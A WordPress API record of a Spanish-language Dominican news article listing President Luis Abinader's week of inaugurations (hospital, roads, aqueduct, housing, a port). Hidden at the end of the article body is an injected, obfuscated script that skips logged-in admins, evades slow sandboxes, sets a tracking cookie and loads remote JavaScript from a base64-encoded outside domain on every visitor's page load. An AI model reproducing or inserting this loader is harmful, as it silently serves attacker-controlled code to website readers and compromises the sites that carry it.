{"id":14232,"date":"2023-02-21T13:37:16","date_gmt":"2023-02-21T17:37:16","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14232"},"modified":"2023-02-21T13:37:16","modified_gmt":"2023-02-21T17:37:16","slug":"presidente-abinader-inaugurara-mas-de-17-obras-esta-semana-en-varias-provincias","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14232","title":{"rendered":"Presidente Abinader inaugurar\u00e1 m\u00e1s de 17 obras esta semana en varias provincias"},"content":{"rendered":"<p>Santo Domingo.-\u00a0<strong>El Presidente Luis Abinader<\/strong>\u00a0desarrollar\u00e1 esta semana una\u00a0<strong>amplia agenda de inauguraciones\u00a0<\/strong>en diversas provincias del pa\u00eds, la cual incluye viviendas, un hospital, carreteras, un acueducto, instalaciones deportivas y Comedores Econ\u00f3micos.<\/p>\n<p>El mandatario iniciar\u00e1 su agenda de trabajo\u00a0<strong>este martes en la provincia La Romana<\/strong>, donde dejar\u00e1 inaugurados 4 kil\u00f3metros de calles y 9 nuevas viviendas, en Villa Hermosa.<\/p>\n<p>Asimismo, el jefe de Estado inaugurar\u00e1 el Hospital de Villa Hermosa y la entrada de La Romana.<\/p>\n<p>Luego, se trasladar\u00e1 a\u00a0<strong>San Pedro de Macor\u00eds<\/strong>\u00a0para encabezar el acto de inauguraci\u00f3n del\u00a0<strong>Centro de Simulaci\u00f3n de Salud de la Universidad Central del Este (UCE).<\/strong><\/p>\n<p>Mas tarde, en<strong>\u00a0Santo Domingo<\/strong>, inaugurar\u00e1 el\u00a0<strong>elevado<\/strong>\u00a0de Andr\u00e9s, Boca Chica, y 8 kil\u00f3metros de la<strong>\u00a0marginal de la autopista Las Am\u00e9ricas<\/strong>. Adem\u00e1s, asistir\u00e1 al acto de inauguraci\u00f3n de 200 MW de la\u00a0<strong>Turbina de Gas Natural<\/strong>, en Boca Chica, SIBA Energy.<\/p>\n<p><strong>Mi\u00e9rcoles 22 Santo Domingo<\/strong><\/p>\n<p>Para el mi\u00e9rcoles, el Presidente Abinader continuar\u00e1 su programa con la inauguraci\u00f3n del remozamiento del\u00a0<strong>Club San Carlos<\/strong>\u00a0en el Distrito nacional y del\u00a0<strong>Paseo de los Indios<\/strong>, en el Parque Mirador Sur.<\/p>\n<p><strong>Jueves 23 San Crist\u00f3bal y Santo Domingo<\/strong><\/p>\n<p>El gobernante se trasladar\u00e1 el jueves al municipio de Haina, provincia San Crist\u00f3bal, para dejar inaugurado\u00a0<strong>Acueducto de Haina<\/strong>.<\/p>\n<p>Luego, en Herrera, Santo Domingo, inaugurar\u00e1 un\u00a0<strong>Comedor Econ\u00f3mico\u00a0<\/strong>y anunciar\u00e1 la apertura de varios m\u00e1s en todo el pa\u00eds. En Los Guaricanos, Santo Domingo Norte,\u00a0<strong>entregar\u00e1 cientos de apartamentos.<\/strong><\/p>\n<p><strong>Viernes 24 Puerto Plata<\/strong><\/p>\n<p>El Presidente Abinader proseguir\u00e1 con la inauguraci\u00f3n de la\u00a0<strong>segunda fase del Puerto Tur\u00edstico Taino Bay<\/strong>, en Puerto Plata.<\/p>\n<p><strong>S\u00e1bado 25 Santiago, Moca y SFM<\/strong><\/p>\n<p>Continuando con su amplia agenda de inauguraciones, el gobernante recorrer\u00e1 el s\u00e1bado las provincias de\u00a0<strong>Santiago, Espaillat y San Francisco de Macor\u00eds.<\/strong><\/p>\n<p>Iniciar\u00e1 su recorrido en Santiago con la inauguraci\u00f3n de la\u00a0<strong>carretera Hermanas Mirabal.<\/strong><\/p>\n<p>Posteriormente, se trasladar\u00e1 al municipio de Moca, provincia Espaillat, donde dejar\u00e1 inaugurada la\u00a0<strong>carretera Moca\/Salcedo<\/strong>\u00a0y luego entregar\u00e1 un\u00a0<strong>proyecto de apartamentos.<\/strong><\/p>\n<p>El jefe de Estado finalizar\u00e1 su jornada de trabajo con\u00a0<strong>varias inauguraciones en San Francisco de Macor\u00eds.<\/strong><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.-\u00a0El Presidente Luis Abinader\u00a0desarrollar\u00e1 esta semana una\u00a0amplia agenda de inauguraciones\u00a0en diversas provincias del pa\u00eds, la cual incluye viviendas, un hospital, carreteras, un acueducto, instalaciones deportivas y Comedores Econ\u00f3micos. El mandatario iniciar\u00e1 su agenda de trabajo\u00a0este martes en la provincia La Romana, donde dejar\u00e1 inaugurados 4 kil\u00f3metros de calles y 9 nuevas viviendas, en Villa [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14234,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14232","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14232"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14232\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}